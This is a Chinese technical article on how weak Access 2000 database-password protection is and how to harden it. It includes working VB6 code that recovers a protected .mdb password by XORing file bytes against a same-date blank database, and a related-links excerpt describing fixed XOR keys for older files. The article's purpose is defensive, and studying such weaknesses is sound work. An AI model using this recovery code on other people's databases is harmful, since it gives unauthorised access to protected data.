防止Access 2000密码被破译的方法

如果你过分信任 Access 2000数据库的密码保护,你可能会因此而蒙受损失。这是因为Access 2000的数据库级密码并不安全,相反它很脆弱,甚至下面这段非常小的程序就可以攻破它:

程序一(VB6):Access 2000密码破译
Private Sub Command1_Click()
Const Offset = &H43 文件偏移地址:Access数据库从此处开始存放加密密码
Dim bEmpty(1 To 2) As Byte, bPass(1 To 2) As Byte
Dim i As Integer, Password As String
打开一个空数据库作为参照
Open "D:\VB6_Test\MDB_Password\New_Empty_DB.mdb" For Binary As #1
打开被密码保护的数据库
Open "D:\VB6_Test\MDB_Password\Pass_Protected_DB.mdb" For Binary As #2
Seek #1, Offset
Seek #2, Offset
For i = 1 To 20 ' Access 2000 数据库密码最长允许20位
Get #1, , bEmpty ' 其中每位密码占两个字节
Get #2, , bPass ' 一个汉字也仅是一位密码,占两个字节
If (bEmpty(1) Xor bPass(1)) <> 0 Then
Password = Password + Chr(bEmpty(1) Xor bPass(1)) ' 将密码解密
End If
Next
Close 1, 2
MsgBox "Password:" + Password ' 显示密码
End Sub
一、深入分析
上述程序成功的关键是使用了一个空数据库(New_Empty_DB.mdb)。该数据库的创建日期必须与被密码保护的数据库(Pass_Protected_DB.mdb)相一致。 换句话说,Access 2000 仅仅是使用“数据库创建日期”来加密用户密码。

应注意的是:上面的“创建日期”只是操作系统级的,也就是 Windows记录在文件夹目录里的信息(根据文件名的长短,每个文件在目录里占用至少32个字节,包括:文件名、属性、文件大小、首蔟号、创建时间、修改时间和访问时间等)。
Access 2000 在数据库中也记录了该数据库的“创建日期”。加密数据库密码的正是数据库内部记录的这个“创建日期”。该日期只有在数据库被成功打开后才能看到。但在一般情况下,操作系统级的以及数据库内保存的“创建日期”是完全一样的,因此这为破译者提供了方便。
上述程序中还有一点需要说明:为简明起见,解密密码时仅处理了双字节的首字节,因此它仅对非汉字密码有效。若要解密汉字密码,须对双字节均做处理。
二、防范措施
1、隐藏“创建日期”
从上面的分析可以看出,既然“创建日期”是破译的关键,那么我们应“对症下药”,将真实的“创建日期”隐藏起来。
第一步,创建数据库时,使用一个“不可思议的、别人不易猜测”的日期。做法为:修改 Windows系统日期,例如改为2026年05月15日,创建数据库后再将系统日期改回。这个“不可思议”的日期即为该数据库的真实“创建日期”。
第二步,修改操作系统级的“创建日期”。上述第一步完成后,该数据库在操作系统级的创建日期也是2026年05月15日,必须加以修改,以达到隐藏真实创建日期的目的。修改操作系统级的“创建日期”可以由下面的程序二完成。

程序二(VB6):修改文件在操作系统级的“创建日期”
Private Type FILETIME
dwLowDateTime As Long
dwHighDateTime As Long
End Type
Private Type SYSTEMTIME
wYear As Integer
wMonth As Integer
wDayOfWeek As Integer
wDay As Integer
wHour As Integer
wMinute As Integer
wSecond As Integer
wMilliseconds As Integer
End Type
Private Const GENERIC_WRITE = &H40000000
Private Const OPEN_EXISTING = 3
Private Const FILE_SHARE_READ = &H1
Private Const FILE_SHARE_WRITE = &H2
Private Declare Function SetFileTimeWrite Lib "kernel32" Alias _
"SetFileTime" (ByVal hFile As Long, lpCreateTime As FILETIME, _
ByVal NullP As Long, ByVal NullP2 As Long) As Long
Private Declare Function SystemTimeToFileTime Lib "kernel32" _
(lpSystemTime As SYSTEMTIME, lpFileTime As FILETIME) As Long
Private Declare Function CreateFile Lib "kernel32" Alias "CreateFileA" _
(ByVal lpFileName As String, ByVal dwDesiredAccess As Long, ByVal _
dwShareMode As Long, ByVal lpSecurityAttributes As Long, ByVal _
dwCreationDisposition As Long, ByVal dwFlagsAndAttributes As Long, _
ByVal hTemplateFile As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) _
As Long
Private Declare Function LocalFileTimeToFileTime Lib "kernel32" _
(lpLocalFileTime As FILETIME, lpFileTime As FILETIME) As Long
Private Sub Command1_Click()
Dim Year As Integer, Month As Integer, Day As Integer
Dim Hour As Integer, Minute As Integer, Second As Integer
Dim TimeStamp As Variant, Filename As String, X As Integer
Year = 2001: Month = 3: Day = 13 ' 准备设定的“创建日期”
Hour = 12: Minute = 0: Second = 26
TimeStamp = DateSerial(Year, Month, Day) + TimeSerial(Hour, Minute, Second)
Filename = "D:\VB6_Test\MDB_Password\Pass_Protected_DB.mdb" ' 目标文件名
X = ModifyFileStamp(Filename, TimeStamp)
End Sub
Function ModifyFileStamp(Filename As String, TimeStamp As Variant) As Integer
Dim X As Long, Handle As Long, System_Time As SYSTEMTIME
Dim File_Time As FILETIME, Local_Time As FILETIME
System_Time.wYear = Year(TimeStamp): System_Time.wMonth = Month(TimeStamp)
System_Time.wDay = Day(TimeStamp)
System_Time.wDayOfWeek = Weekday(TimeStamp) - 1
System_Time.wHour = Hour(TimeStamp): System_Time.wSecond = Second(TimeStamp)
System_Time.wMilliseconds = 0
X = SystemTimeToFileTime(System_Time, Local_Time)
X = LocalFileTimeToFileTime(Local_Time, File_Time) ' 转换成可用的类型
Handle = CreateFile(Filename, GENERIC_WRITE, FILE_SHARE_READ Or _
FILE_SHARE_WRITE, ByVal 0&, OPEN_EXISTING, 0, 0) ' 打开文件
X = SetFileTimeWrite(Handle, File_Time, ByVal 0&, ByVal 0&) ' 设置日期
CloseHandle Handle ' 关闭文件
End Function
图三显示的是数据库的真实“创建日期”以及经程序二伪装的操作系统级的“假象”日期。

可以看出,隐藏“创建日期”的方法对破译者来说只是增大了破译的工作量,增加了破解试验的次数。只有将该方法与下述的“方法二”相结合,才能达到“既治标又治本”的效果。不过在一般的情况下“方法一”已够用,因为如果破译者起始使用的测试日期与最终的真实日期相差百年,他需要付出数万次的努力!
2、使用用户级安全机制
通过设置不同的用户帐号和组帐号对数据库中的各种资源进行权限管理。这种加强了的安全机制虽然给日常使用(尤其是单用户使用)带来了不便,但在有安全隐患的地方依然有设置的必要。
设置各种帐号及相应权限的简单方法是使用“设置安全机制向导”(见图四)。图四还显示了安全机制启动后要求用户登录的画面。

三、结论
所谓“道高一尺魔高一丈”,因为这世上并没有绝对的安全。上述方法一的目的是提高破译的成本以达到常人难以接受的程度;而方法二的初衷是增加密码的数量。两种方法的结合足以使破译者望而却步。不过这并不意味着百分之百的安全。但从思想上提高安全意识,防患于未然,这毕竟是正确的选择。

时间: 2024-08-03 05:58:22

防止Access 2000密码被破译的方法的相关文章

C#破解access数据库密码方法

原文:C#破解access数据库密码方法 using System; using System.Collections.Generic; using System.IO; using System.Linq; using System.Text; using System.Windows.Forms; namespace Demo { class Program { [STAThread] static void Main(string[] args) { OpenFileDialog f =

破解Access的密码

在mdb文件第0x42字节处的13个字节分别与0x86,0xfb,0xec,0x37,0x5d,0x44,0x9c,0xfa,0xc6,0x5e,0x28,0xe6,0x13异或后即可得到数据库的密码.但在Access 2000和2002的版本里密钥不再是固定的13个字节.而且加密的方式也有了变化. 经过ccrun用一下午的时间研究,终于将Access2000的加密方式搞清楚了.嘿嘿.在此将偶的心得发布.希望对大家有用,如果您发现我的理解有误,请来信告之我们.信箱:info@ccrun.com

用DAO或ADO正确访问Access 2000

当你使用 DAO 访问 Access 2000 时,是否会出现以下的错误信息? "Run-time error 3343 Unrecognized Database Format XXX" 这个错误信息有二个解决的方式: 1.如果你是使用 Data Control 来连结 Access 2000 的资料库时: 你必须在设定 Data Control 的 Source 前先加上一行 Set Data1.Recordset = rsDAO36 'rsDAO36 is a DAO 3.6 2

升级至 Access 2000 时出现不可识别的数据库格式错误消息

access|错误|数据|数据库 这篇文章中的信息适用于: Microsoft Visual Basic Professional Edition for Windows 5.0, 6.0 Microsoft Visual Basic Enterprise Edition for Windows 5.0, 6.0 Microsoft Access 2000 Microsoft Data Access Components 2.5, 2.6本文的发布号曾为 CHS238401 症状当您试图从 Vi

保护Access 2000数据库的安全

access|安全|数据|数据库     在Office家族成员中,人们对于Access 2000的了解,往往只局限在它的操作界面中,对于数据库管理的功能仍只是停留在建立表.数据输入.使用窗体向导.报表向导.数据访问页向导等一些简单的应用上.其实Access 2000的功能十分强大,且超乎你的想像.它是微软自公布Access以来功能最全面.与Windows和Internet结合最紧密的数据库软件,是一个功能非常强大,而且简单易用的数据库管理系统(DBMS),即对数据库进行存储.处理和管理的系统.

完全保护Access 2000数据库的安全

在Office家族成员中,人们对于Access 2000的了解,往往只局限在它的操作界面中,对于数据库管理的功能仍只是停留在建立表.数据输入.使用窗体向导.报表向导.数据访问页向导等一些简单的应用上.其实Access 2000的功能十分强大,且超乎你的想像.它是微软自公布Access以来功能最全面.与Windows和Internet结合最紧密的数据库软件,是一个功能非常强大,而且简单易用的数据库管理系统(DBMS),即对数据库进行存储.处理和管理的系统. 管理工作组信息文件 对于数据库而言,由于

Access转成SQL数据库的方法_数据库其它

首先,我说的是在ACCESS2000,SQL2000之间转换,其他的我也还没有尝试过,希望大家多多试验,肯定是有办法的. 转换的方法 1.打开"控制面板"下"管理工具"中的"数据库源". 2.按"添加"添加一个新的数据源,在选择栏里选"Driver do microsoft Access (*.mdb)",完成后将出现一个框,在"数据库源"里面输入你想写的名称,我取名叫"ABC

用Access 2000进行班级管理

access  教师的责任与义务从未因为时代的变迁而削弱过,教育本身的特殊性使教师成为知识的传播者和人类灵魂的塑造者.而作为中小学的班主任教师,需要担负的责任却远比这要实际得多,也繁琐得多.庞杂的学生基本信息需要管理和上报,班级日常事务要纳入班级管理日志中,学生的思想问题需要面对面个别解决,凡此种种,往往令班主任顾此失彼.如何能够有效地组织班级管理,并使所有信息井然有序是班主任十分关心的问题. 根据我们的了解,班主任在日常工作中面临的主要困难有以下几点: 1. 学生基本信息量比较大,手工记录费时

Access 2000 数据库 80 万记录通用快速分页类

access|分页|数据|数据库 作者:萧月痕(xiaoyuehen)地址:http://blog.csdn.net/xiaoyuehen/archive/2005/01/17/257202.aspx 转贴请包含相关信息, 谢谢. 主要思路: 用一条语句统计(Count)出记录数(而不在查询时获得 RecordCount 属性), 缓存在 Cookies 中, 跳转时就不用再次统计, 分页跳转链接也由此来, 使用 ADO 的 AbsolutePage 属性设置当前页面, 返回intPageSiz